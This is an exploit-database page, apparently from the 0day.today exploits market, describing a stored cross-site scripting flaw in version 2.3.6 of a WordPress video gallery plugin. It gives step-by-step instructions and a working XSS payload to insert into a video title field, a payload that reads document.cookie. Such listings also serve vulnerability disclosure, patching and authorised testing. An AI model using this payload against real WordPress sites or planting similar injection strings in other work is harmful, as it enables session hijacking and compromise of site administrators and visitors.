[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Gallery 2.3.6 Cross Site Scripting Vulnerability

Author
tmrswrr
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-39672
Category
web applications
Date add
02-07-2024
Platform
php
# Exploit Title: Wordpress Gallery Version 2.3.6 Stored XSS
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://total-soft.com/wp-video-gallery/
# Version 2.3.6


### Steps to Execute the Payload:

1. **Access the Admin Panel:**
   - Navigate to the admin panel of your WordPress site.
   - Go to `TS Video Gallery  > `Create ` > ` Use Theme` via the following URL: 
     ```
     https://127.0.0.1/wp-admin/admin.php?page=tsvg-builder&tsvg-theme=grid_video_gallery
     ```

2. **Insert the Payload:**
   - In the **Click New Video** section, **Write Add Title insert the following payload:
     ```
     "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>
     ```

3. **Save and Verify:**
   - You should see the payload executed.

#  0day.today [2024-07-07]  #